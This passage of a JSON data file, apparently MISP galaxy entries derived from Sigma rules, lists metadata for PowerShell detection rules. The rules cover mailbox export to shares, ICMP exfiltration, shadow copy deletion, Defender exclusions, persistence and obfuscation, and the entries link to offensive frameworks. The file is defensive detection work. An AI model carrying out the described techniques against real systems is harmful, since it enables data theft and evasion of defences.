"Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-26", "falsepositive": [ "Unknown" ], "filename": "posh_ps_mailboxexport_share.yml", "level": "critical", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", "https://youtu.be/5mqid-7zp8k?t=2481", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" ], "tags": [ "attack.exfiltration" ] }, "uuid": "4a241dea-235b-4a7e-8d76-50d817b146c4", "value": "Suspicious PowerShell Mailbox Export to Share - PS" }, { "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", "meta": { "author": "frack113", "creation_date": "2021-12-13", "falsepositive": [ "Unknown" ], "filename": "posh_ps_get_childitem_bookmarks.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml" ], "tags": [ "attack.discovery", "attack.t1217" ] }, "related": [ { "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", "value": "Automated Collection Bookmarks Using Get-ChildItem PowerShell" }, { "description": "Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts", "meta": { "author": "frack113", "creation_date": "2023-01-08", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_set_alias.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/1337Rin/Swag-PSO", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_set_alias.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1027", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "96cd126d-f970-49c4-848a-da3a09f55c55", "value": "Potential PowerShell Obfuscation Using Alias Cmdlets" }, { "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", "meta": { "author": "frack113", "creation_date": "2021-08-19", "falsepositive": [ "Unknown" ], "filename": "posh_ps_wmi_persistence.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1546.003" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", "value": "Powershell WMI Persistence" }, { "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_clip.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "73e67340-0d25-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell" }, { "description": "Detects use of WinAPI functions in PowerShell scripts", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Nikita Nazarov, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Unknown" ], "filename": "posh_ps_win_api_susp_access.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win_api_susp_access.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.t1106" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "03d83090-8cba-44a0-b02f-0b756a050306", "value": "Potential WinAPI Calls Via PowerShell Scripts" }, { "description": "Detects keywords from well-known PowerShell exploitation frameworks", "meta": { "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "creation_date": "2017-03-05", "falsepositive": [ "Depending on the scripts, this rule might require some initial tuning to fit the environment" ], "filename": "posh_ps_malicious_keywords.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=2921", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f62176f3-8128-4faa-bf6c-83261322e5eb", "value": "Malicious PowerShell Keywords" }, { "description": "Detects the execution of powershell scripts with calls to the \"Start-NetEventSession\" cmdlet. Which allows an attacker to start event and packet capture for a network event session.\nAdversaries may attempt to capture network to gather information over the course of an operation.\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol.\n", "meta": { "author": "frack113", "creation_date": "2024-05-12", "falsepositive": [ "Legitimate network diagnostic scripts." ], "filename": "posh_ps_packet_capture.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/5f866ca4517e837c4ea576e7309d0891e78080a8/atomics/T1040/T1040.md#atomic-test-16---powershell-network-sniffing", "https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/7b8935fe4c82cb64d61343de1a8b2e38dd968534/handbooks/10_post_exploitation.md", "https://github.com/forgottentq/powershell/blob/9e616363d497143dc955c4fdce68e5c18d28a6cb/captureWindows-Endpoint.ps1#L13", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_packet_capture.yml" ], "tags": [ "attack.credential-access", "attack.discovery", "attack.t1040" ] }, "related": [ { "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "da34e323-1e65-42db-83be-a6725ac2caa3", "value": "Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock" }, { "description": "Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-05", "falsepositive": [ "The same functionality can be implemented by admin scripts, correlate with name and creator" ], "filename": "posh_ps_resolve_list_of_ip_from_file.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.fortypoundhead.com/showcontent.asp?artid=24022", "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml" ], "tags": [ "attack.exfiltration", "attack.t1020" ] }, "related": [ { "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fbc5e92f-3044-4e73-a5c6-1c4359b539de", "value": "PowerShell Script With File Hostname Resolving Capabilities" }, { "description": "Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Unknown" ], "filename": "posh_ps_wmi_unquoted_service_search.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "09658312-bc27-4a3b-91c5-e49ab9046d1b", "value": "WMIC Unquoted Services Path Lookup - PowerShell" }, { "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-16", "falsepositive": [ "Legitimate administration activities" ], "filename": "posh_ps_software_discovery.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", "https://github.com/harleyQu1nn/AggressorScripts", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1518" ] }, "related": [ { "dest-uuid": "e3b6daca-e963-4a69-aee6-ed4fd653ad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", "value": "Detected Windows Software Discovery - PowerShell" }, { "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", "meta": { "author": "frack113", "creation_date": "2022-01-19", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_xml_iex.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_xml_iex.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", "value": "Powershell XML Execute Command" }, { "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", "meta": { "author": "frack113", "creation_date": "2021-12-30", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_cor_profiler.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cor_profiler.yml" ], "tags": [ "attack.persistence", "attack.t1574.012" ] }, "related": [ { "dest-uuid": "ffeb0780-356e-4261-b036-cfb6bd234335", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "23590215-4702-4a70-8805-8dc9e58314a2", "value": "Registry-Free Process Scope COR_PROFILER" }, { "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-21", "falsepositive": [ "Legitimate administration scripts" ], "filename": "posh_ps_hotfix_enum.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", "value": "PowerShell Hotfix Enumeration" }, { "description": "Detects PowerShell scripts to set the ACL to a file in the Windows folder", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-18", "falsepositive": [ "Unknown" ], "filename": "posh_ps_set_acl_susp_location.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1", "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_acl_susp_location.yml" ], "tags": [ "attack.defense-evasion", "attack.t1222" ] }, "related": [ { "dest-uuid": "65917ae0-b854-4139-83fe-bf2441cf0196", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3bf1d859-3a7e-44cb-8809-a99e066d3478", "value": "PowerShell Set-Acl On Windows Folder - PsScript" }, { "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", "meta": { "author": "frack113", "creation_date": "2021-12-26", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_win32_shadowcopy.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", "value": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script" }, { "description": "Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework", "meta": { "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)", "creation_date": "2019-02-11", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_keywords.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", "value": "Potential Suspicious PowerShell Keywords" }, { "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", "meta": { "author": "Bartlomiej Czyz @bczyz1, oscd.community", "creation_date": "2020-10-10", "falsepositive": [ "Legitimate usage of System.Net.NetworkInformation.Ping class" ], "filename": "posh_ps_icmp_exfiltration.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_icmp_exfiltration.yml" ], "tags": [ "attack.exfiltration", "attack.t1048.003" ] }, "related": [ { "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4c4af3cd-2115-479c-8193-6b8bfce9001c", "value": "PowerShell ICMP Exfiltration" }, { "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-16", "falsepositive": [ "Unknown" ], "filename": "posh_ps_win_defender_exclusions_added.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562", "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c1344fa2-323b-4d2e-9176-84b4d4821c88", "value": "Windows Defender Exclusions Added - PowerShell" }, { "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-17", "falsepositive": [ "Rare intended use of hidden services", "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "filename": "posh_ps_using_set_service_to_hide_services.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "953945c5-22fe-4a92-9f8a-a9edc1e522da", "value": "Abuse of Service Permissions to Hide Services Via Set-Service - PS" }, { "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", "meta": { "author": "frack113", "creation_date": "2022-01-23", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_test_netconnection.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", "https://learn.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml" ], "tags": [ "attack.command-and-control", "attack.t1571" ] }, "related": [ { "dest-uuid": "b18eae87-b469-4e14-b454-b171b416bc18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", "value": "Testing Usage of Uncommonly Used Port" }, { "description": "Detects creation of a local user via PowerShell", "meta": { "author": "@ROxPinTeddy", "creation_date": "2020-04-11", "falsepositive": [ "Legitimate user creation" ], "filename": "posh_ps_create_local_user.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_local_user.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.persistence", "attack.t1136.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "243de76f-4725-4f2e-8225-a8a69b15ad61", "value": "PowerShell Create Local User" }, { "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", "meta": { "author": "Sami Ruohonen", "creation_date": "2018-07-24", "falsepositive": [ "Unknown" ], "filename": "posh_ps_ntfs_ads_access.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20220614030603/http://www.powertheshell.com/ntfsstreams/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8c521530-5169-495d-a199-0a3a881ad24e", "value": "NTFS Alternate Data Stream" }, { "description": "Detects the installation and configuration of PowerShell Web Access, which could be used for remote access and potential abuse", "meta": { "author": "Michael Haag", "creation_date": "2024-09-03", "falsepositive": [ "Legitimate PowerShell Web Access installations by administrators" ], "filename": "posh_ps_powershell_web_access_installation.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a", "https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41", "https://docs.microsoft.com/en-us/powershell/module/powershellwebaccess/install-pswawebapplication", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powershell_web_access_installation.yml" ], "tags": [ "attack.persistence", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5f9c7f1a-7c21-4c39-b2f3-8d8006e0e51f", "value": "PowerShell Web Access Installation - PsScript" }, { "description": "Detects Cmdlet names from PowerView of the PowerSploit exploitation framework.", "meta": { "author": "Bhabesh Raj", "creation_date": "2021-05-18", "falsepositive": [ "Unknown" ], "filename": "posh_ps_powerview_malicious_commandlets.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=2277", "https://thedfirreport.com/2020/10/08/ryuks-return", "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", "https://powersploit.readthedocs.io/en/stable/Recon/README", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dcd74b95-3f36-4ed9-9598-0490951643aa", "value": "PowerView PowerShell Cmdlets - ScriptBlock" }, { "description": "Detects suspicious PowerShell invocation command parameters", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "creation_date": "2017-03-05", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_invocation_specific.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", "value": "Suspicious PowerShell Invocations - Specific" }, { "description": "Detect use of X509Enrollment", "meta": { "author": "frack113", "creation_date": "2022-12-23", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_x509enrollment.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "504d63cb-0dba-4d02-8531-e72981aace2c", "value": "Suspicious X509Enrollment - Ps Script" }, { "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", "meta": { "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "creation_date": "2020-10-05", "falsepositive": [ "App-V clients" ], "filename": "posh_ps_syncappvpublishingserver_exe.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dddfebae-c46f-439c-af7a-fdb6bde90218", "value": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction" }, { "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", "meta": { "author": "frack113", "creation_date": "2022-02-01", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_unblock_file.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2", 